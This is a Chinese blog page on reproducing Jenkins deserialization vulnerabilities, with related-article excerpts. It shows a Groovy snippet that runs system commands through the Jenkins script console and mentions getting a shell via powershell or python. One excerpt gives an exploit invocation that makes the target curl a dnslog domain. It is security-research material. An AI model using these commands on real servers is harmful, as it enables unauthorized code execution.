Jenkins反序列化漏洞复现

2019-10-11 11:45:59 543 收藏
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36119192/article/details/102477721
版权

Jenkins

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。

Jenkins功能包括:

  • 持续的软件版本发布/测试项目。
  • 监控外部调用执行的工作。

Jenkins曾经发生的反序列化漏洞:

  • CVE-2015-8103
  • CVE-2016-9299
  • CVE-2017-1000353
  • CVE-2018-1000861

Jenkins后台执行命令

访问:http://xx.xx.xx.xx/script

def cmd = 'ifconfig'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout

了解本专栏 订阅博主 解锁全文
已标记关键词 清除标记
序列化漏洞汇总
weixin_29324013的博客
07-03 2万+
序列化漏洞汇总1、概述序列化是让Java对象脱离Java运行环境的一种手段,可以有效的实现多平台之间的通信、对象持久化存储。 Java 序列化是指把 Java 对象转换为字节序列的过程,便于保存在内存、文件、数据库中,ObjectOutputStream类的 writeObject() 方法可以实现序列化序列化是指把字节序列恢复为 Java 对象的过程,ObjectInputStream 类...
表情包
插入表情
还能输入1000个字符
序列化序列化漏洞的简单理解
jameson_的专栏
06-28 1万+
1 背景 2015年11月6日,FoxGlove Security安全团队的@breenmachine 发布的一篇博客[3]中介绍了如何利用Java序列化漏洞,来攻击最新版的WebLogic、WebSphere、JBoss、Jenkins、OpenNMS这些大名鼎鼎的Java应用,实现远程代码执行。 然而事实上,博客作者并不是漏洞发现者。博客中提到,早在2015年的1月28号,Gabriel
Jenkins漏洞利用复现
weixin_30564901的博客
09-26 438
一、未授权访问 访问url: http://172.16.20.134:8080/script 命令执行 println "ls -al".execute().text 也可以利用powershell 或者python脚本弹shell 二、CVE-2018-1000861远程命令执行漏洞 payload...
java序列化漏洞实战
weixin_34009794的博客
04-01 426
准备: 域名一个,用于增加NS解析,判断是否存在序列化漏洞。 公网IP服务器一台,用于搭建DNS代理,抓包判断。 dnschef,DNS代理 ysoserial.jar生成payload. 简单的python脚本,调用ysoserial.jar并发送payload 首先域名增加一条A记录解析到公网IP服务,然后增加一条NS记录指向这条A记录。 然后公网IP服务器 开...
漏洞复现Jenkins序列化漏洞CVE-2017-100035/ CVE-2018-1000861
weixin_45556536的博客
11-17 89
Jenkins序列化漏洞利用CVE-2017-1000353基础知识漏洞原理影响版本复现思路复现—CVE-2018-10008611、特征检测 基础知识   序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;序列化即逆过程,由字节流还原成对象。   Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于序列化。   形成漏洞的根源在于类ObjectInputStream在序列
[应用漏洞]Jenkins
不忘初心,护天下安全!
08-09 208
漏洞又遇到了,暂且把待学习的文章写一下,等不及我消化的童鞋直接看链接吧: https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 ...
CVE-2015-4852 java 序列化漏洞--weblogic补丁
水滴石穿
01-04 2万+
    CVE-2015-4852 Patch Availability Document for Oracle WebLogic Server Component of Oracle Fusion Middleware (Doc ID 2075927.1) To Bottom APPLIES TO: PeopleSoft Enterprise PT Peo...
jenkins 漏洞集合 简介
whatday的专栏
06-04 1306
目录 CVE-2015-8103 序列化远程代码执行 CVE-2016-0788 Jenkins CI和LTS 远程代码执行漏洞 CVE-2016-0792 低权限用户命令执行 CVE-2016-9299 代码执行 CVE-2017-1000353 Jenkins-CI 远程代码执行 CVE-2018-1000110 用户枚举 CVE-2018-1000861 远程命令执行 CVE-2018-1999002 任意文件读取 CVE-2018-1000600 Jenkins GitHub 信
jenkins 序列化漏洞 cve-2017-1000353
whatday的专栏
06-13 365
一、漏洞原理: 首先这是一个java序列化漏洞,一定是command在序列化信息中,序列化时候直接执行了该命令。 攻击过程学习: 下文的session是一个uuid,类型4 # 可以如下生成 session = uuid.uuid4() 1、首先要发送一个请求,是一个下载请求。这个请求是要启动一个双向数据传输频道。频道的标识就是session。而side字段则是用来标识传输方向 对应代码段: def Download(url,session): headers = {'Si
利用Vulnhub复现漏洞 - Jenkins远程命令执行漏洞(CVE-2018-1000861)
JiangBuLiu的博客
07-11 3600
Jenkins远程命令执行漏洞(CVE-2018-1000861)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现POC检验 Vulnhub官方复现教程 https://vulhub.org/#/environments/jenkins/CVE-2018-1000861/ 漏洞原理 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这...
Jenkins Java 序列化远程执行代码漏洞(CVE-2017-1000353)
WY92139010的博客
08-05 240
Jenkins Java 序列化远程执行代码漏洞(CVE-2017-1000353) 一、漏洞描述 该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中,jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令,从而获取系统权限,造成数据泄露。 二、漏洞影响版本 所有jenkins主版本均受到影响(包括<=2.56版本) 所有的jenkins...
Jenkins cve-2016-0792 漏洞复现 Xstream 序列化漏洞
whatday的专栏
07-19 282
环境搭建 首先需要安装jenkins,这里使用的是1.642.1版本,其他版本可以自行下载,在官网和百度一开始都是没找到的,包括看了其他人的分析,但是都没有找到环境搭建,大部分是直接复现和poc分析 下载链接 http://archives.jenkins-ci.org/war-stable/1.642.1/jenkins.war 这里需要在本地配置java环境,具体方法这里不在介绍,我复现使用的是java8 java -jar jenkins.war --httpPort=8080 htt.
Jenkins-CVE-2016-0792漏洞复现(Xstream 序列化漏洞
whojoe的博客
06-04 494
Jenkins-CVE-2016-0792漏洞复现(Xstream 序列化漏洞)环境搭建漏洞复现环境清理参考文章 环境搭建 首先需要安装jenkins,这里使用的是1.642.1版本,其他版本可以自行下载,在官网和百度一开始都是没找到的,包括看了其他人的分析,但是都没有找到环境搭建,大部分是直接复现和poc分析 下载链接 http://archives.jenkins-ci.org/war-stable/1.642.1/jenkins.war 这里需要在本地配置java环境,具体方法这里不在介绍,我复现
Lib之过?Java序列化漏洞通用利用分析
weixin_34259159的博客
11-14 123
2019独角兽企业重金招聘Python工程师标准>>> ...
JAVA序列化系列漏洞复现
谢公子的博客
05-31 3936
目录 Weblogic序列化漏洞 Weblogic < 10.3.6 'wls-wsat' XMLDecoder 序列化漏洞(CVE-2017-10271) Weblogic WLS Core Components 序列化命令执行漏洞(CVE-2018-2628) Weblogic序列化漏洞(CVE-2019-2725) JBOSS序列化漏洞 JBoss JMXInvo...
Jenkins远程命令执行漏洞(CVE-2018-1000861)
GGyao的博客
05-23 1503
漏洞复现 1、查看目标版本。 curl -s -I http://xxx:8080| grep X-Jenkins 2、利用工具。 https://github.com/orangetw/awesome-jenkins-rce-2019 usage: python2.7m exp.py http://target.com ‘curl b2x6ay.dnslog.cn’ 3、成功接收dnslog。 ...
CVE-2015-5254(ActiveMQ序列化漏洞复现)
Sea_Sand息禅
07-13 1416
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者...
Jenkins漏洞利用复现-CVE-2017-1000353
Xor0ne
08-01 195
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。 Jenkins功能包括: 1、持续的软件版本发布/测试项目。 2、监控外部调用执行的工作。 文章目录1、漏洞描述及环境2、漏洞复现2.1、工具下载2.2、工具利用2.3、检验参考链接: 1、漏洞描述及环境 环境名称: vulfocus/jenkins-cve_2017_1000353 官方复现教程: https://vulhub.org/#/env
©️2020 CSDN 皮肤主题: Age of Ai 设计师:meimeiellie 返回首页
实付 19.90元
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值